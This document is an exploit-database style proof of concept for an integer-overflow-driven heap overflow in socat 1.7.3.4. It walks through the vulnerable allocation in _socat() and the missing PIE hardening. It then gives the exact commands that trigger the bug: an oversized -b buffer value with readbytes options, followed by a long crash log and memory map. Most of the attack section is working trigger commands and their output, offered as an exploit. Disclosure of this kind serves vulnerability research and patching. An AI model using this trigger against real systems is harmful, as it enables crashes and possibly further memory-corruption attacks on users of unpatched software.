Share
# Exploit Title: Socat 1.7.3.4 - Heap Based Overflow (PoC)  
# Date: 2020-02-03  
# Exploit Author: hieubl from HPT Cyber Security  
# Vendor Homepage: http://www.dest-unreach.org/  
# Software Link: http://www.dest-unreach.org/socat/  
# Version: 1.7.3.4  
# Tested on: Ubuntu 16.04.6 LTS  
# CVE :  
  
# Heap-Based Overflow due to Integer Overflow and Lack of PIE mitigation (PoC)  
  
------- [***Description***] -------  
The source code of socat.c contains _socat() function which has the  
Integer Overflow vulnerability:  
int _socat(void) {  
...  
unsigned char *buff;  
...  
buff = Malloc(2*socat_opts.bufsiz+1)  
...  
}  
  
After that, the the line of code "if ((bytes2 = xiotransfer(sock2,  
sock1, &buff, socat_opts.bufsiz, true)) < 0) {" calls the  
xiotransfer() function. The xiotransfer() function calls xioread()  
function. Finally xioread() function calls Read() function.  
  
ssize_t xioread(xiofile_t *file, void *buff, size_t bufsiz) {  
  
...  
Read(pipe->fd, buff, bufsiz); //[***!!!This line of code leads to  
Heap-Based Overflow vulnerability***!!!]  
...  
}  
  
In addition, the "Makefile" file does not turn on the Position  
Independent Executables (PIE) mitigation (the CFLAGS does not contains  
"-pie" flag). By default, Ubuntu 16.04 does not turn on this  
mitigation. Consequently, it is easier to exploit the program, may  
even lead to Remode Code Execution (RCE).  
Reference: https://hackerone.com/reports/415272, $100 bounty for Linux  
Desktop application slack executable does not use pie / no ASLR  
  
------- [***Download and build***] -------  
Download link: http://www.dest-unreach.org/socat/download/socat-1.7.3.4.tar.gz  
$ tar xzvf socat-1.7.3.4.tar.gz  
$ cd socat-1.7.3.4/  
$ ./configure  
Modify "Makefile" file: "CFLAGS = -g -O -D_GNU_SOURCE -Wall  
-Wno-parentheses $(CCOPTS) $(DEFS) $(CPPFLAGS)" (add "-g" flag for  
debugging purpose)  
$ make  
$ sudo make install  
  
------- [***Proof of Concept***] -------  
$ checksec socat  
[*] '/home/natsu/temp/socat-1.7.3.4/socat'  
Arch: amd64-64-little  
RELRO: Partial RELRO  
Stack: Canary found  
NX: NX enabled  
PIE: No PIE (0x400000)  
FORTIFY: Enabled  
>>> There is no PIE mitigation!  
  
$ python -c 'print "A"*1000000' > a  
$ touch b  
$ socat -b9223372036854775888 OPEN:a,readbytes=1000000 OPEN:b,readbytes=1000000  
  
This proof of concept triggers the bugs by setting the buffer size to  
0x8000000000000050(9223372036854775888 in decimal). Therefore, the malloc  
size is passed to "Malloc(2*socat_opts.bufsiz+1)" is 0x100000000000000a0.  
This is equivalent to Malloc(0xa0). The readbytes("readbytes=1000000")  
controls the size of reading (we cannot read with the size too large as  
0x8000000000000050) with these lines of code: if (pipe->readbytes) { if  
(pipe->actbytes == 0) { return 0; } if (pipe->actbytes < bufsiz) { bufsiz =  
pipe->actbytes; } } ------- [***Crash logs***] ------- *** Error in  
`socat': free(): invalid next size (normal): 0x000000000106a110 ***  
======= Backtrace: =========  
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc0ee5817e5]  
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc0ee58a37a]  
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc0ee58e53c]  
socat[0x407e3f]  
socat[0x4084c6]  
socat[0x408f7a]  
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc0ee52a830]  
socat[0x4057a9]  
======= Memory map: ========  
00400000-0044a000 r-xp 00000000 08:01 655643  
/usr/local/bin/socat  
00649000-0064a000 r--p 00049000 08:01 655643  
/usr/local/bin/socat  
0064a000-0064b000 rw-p 0004a000 08:01 655643  
/usr/local/bin/socat  
0064b000-0068c000 rw-p 00000000 00:00 0  
01069000-0108a000 rw-p 00000000 00:00 0  
[heap]  
7fc0e8000000-7fc0e8021000 rw-p 00000000 00:00 0  
7fc0e8021000-7fc0ec000000 ---p 00000000 00:00 0  
7fc0eded3000-7fc0edee9000 r-xp 00000000 08:01 397801  
/lib/x86_64-linux-gnu/libgcc_s.so.1  
7fc0edee9000-7fc0ee0e8000 ---p 00016000 08:01 397801  
/lib/x86_64-linux-gnu/libgcc_s.so.1  
7fc0ee0e8000-7fc0ee0e9000 rw-p 00015000 08:01 397801  
/lib/x86_64-linux-gnu/libgcc_s.so.1  
7fc0ee0e9000-7fc0ee0ec000 r-xp 00000000 08:01 397787  
/lib/x86_64-linux-gnu/libdl-2.23.so  
7fc0ee0ec000-7fc0ee2eb000 ---p 00003000 08:01 397787  
/lib/x86_64-linux-gnu/libdl-2.23.so  
7fc0ee2eb000-7fc0ee2ec000 r--p 00002000 08:01 397787  
/lib/x86_64-linux-gnu/libdl-2.23.so  
7fc0ee2ec000-7fc0ee2ed000 rw-p 00003000 08:01 397787  
/lib/x86_64-linux-gnu/libdl-2.23.so  
7fc0ee2ed000-7fc0ee305000 r-xp 00000000 08:01 397909  
/lib/x86_64-linux-gnu/libpthread-2.23.so  
7fc0ee305000-7fc0ee504000 ---p 00018000 08:01 397909  
/lib/x86_64-linux-gnu/libpthread-2.23.so  
7fc0ee504000-7fc0ee505000 r--p 00017000 08:01 397909  
/lib/x86_64-linux-gnu/libpthread-2.23.so  
7fc0ee505000-7fc0ee506000 rw-p 00018000 08:01 397909  
/lib/x86_64-linux-gnu/libpthread-2.23.so  
7fc0ee506000-7fc0ee50a000 rw-p 00000000 00:00 0  
7fc0ee50a000-7fc0ee6ca000 r-xp 00000000 08:01 397763  
/lib/x86_64-linux-gnu/libc-2.23.so  
7fc0ee6ca000-7fc0ee8ca000 ---p 001c0000 08:01 397763  
/lib/x86_64-linux-gnu/libc-2.23.so  
7fc0ee8ca000-7fc0ee8ce000 r--p 001c0000 08:01 397763  
/lib/x86_64-linux-gnu/libc-2.23.so  
7fc0ee8ce000-7fc0ee8d0000 rw-p 001c4000 08:01 397763  
/lib/x86_64-linux-gnu/libc-2.23.so  
7fc0ee8d0000-7fc0ee8d4000 rw-p 00000000 00:00 0  
7fc0ee8d4000-7fc0eeaef000 r-xp 00000000 08:01 397619  
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0  
7fc0eeaef000-7fc0eecee000 ---p 0021b000 08:01 397619  
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0  
7fc0eecee000-7fc0eed0a000 r--p 0021a000 08:01 397619  
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0  
7fc0eed0a000-7fc0eed16000 rw-p 00236000 08:01 397619  
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0  
7fc0eed16000-7fc0eed19000 rw-p 00000000 00:00 0  
7fc0eed19000-7fc0eed77000 r-xp 00000000 08:01 397620  
/lib/x86_64-linux-gnu/libssl.so.1.0.0  
7fc0eed77000-7fc0eef77000 ---p 0005e000 08:01 397620  
/lib/x86_64-linux-gnu/libssl.so.1.0.0  
7fc0eef77000-7fc0eef7b000 r--p 0005e000 08:01 397620  
/lib/x86_64-linux-gnu/libssl.so.1.0.0  
7fc0eef7b000-7fc0eef82000 rw-p 00062000 08:01 397620  
/lib/x86_64-linux-gnu/libssl.so.1.0.0  
7fc0eef82000-7fc0eef84000 r-xp 00000000 08:01 397944  
/lib/x86_64-linux-gnu/libutil-2.23.so  
7fc0eef84000-7fc0ef183000 ---p 00002000 08:01 397944  
/lib/x86_64-linux-gnu/libutil-2.23.so  
7fc0ef183000-7fc0ef184000 r--p 00001000 08:01 397944  
/lib/x86_64-linux-gnu/libutil-2.23.so  
7fc0ef184000-7fc0ef185000 rw-p 00002000 08:01 397944  
/lib/x86_64-linux-gnu/libutil-2.23.so  
7fc0ef185000-7fc0ef18c000 r-xp 00000000 08:01 397917  
/lib/x86_64-linux-gnu/librt-2.23.so  
7fc0ef18c000-7fc0ef38b000 ---p 00007000 08:01 397917  
/lib/x86_64-linux-gnu/librt-2.23.so  
7fc0ef38b000-7fc0ef38c000 r--p 00006000 08:01 397917  
/lib/x86_64-linux-gnu/librt-2.23.so  
7fc0ef38c000-7fc0ef38d000 rw-p 00007000 08:01 397917  
/lib/x86_64-linux-gnu/librt-2.23.so  
7fc0ef38d000-7fc0ef3b3000 r-xp 00000000 08:01 397735  
/lib/x86_64-linux-gnu/ld-2.23.so  
7fc0ef594000-7fc0ef59a000 rw-p 00000000 00:00 0  
7fc0ef5b1000-7fc0ef5b2000 rw-p 00000000 00:00 0  
7fc0ef5b2000-7fc0ef5b3000 r--p 00025000 08:01 397735  
/lib/x86_64-linux-gnu/ld-2.23.so  
7fc0ef5b3000-7fc0ef5b4000 rw-p 00026000 08:01 397735  
/lib/x86_64-linux-gnu/ld-2.23.so  
7fc0ef5b4000-7fc0ef5b5000 rw-p 00000000 00:00 0  
7ffe11dd9000-7ffe11dfa000 rw-p 00000000 00:00 0  
[stack]  
7ffe11dfb000-7ffe11dfe000 r--p 00000000 00:00 0  
[vvar]  
7ffe11dfe000-7ffe11e00000 r-xp 00000000 00:00 0  
[vdso]  
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  
[vsyscall]  
2020/02/04 05:33:00 socat[47233] E exiting on signal 6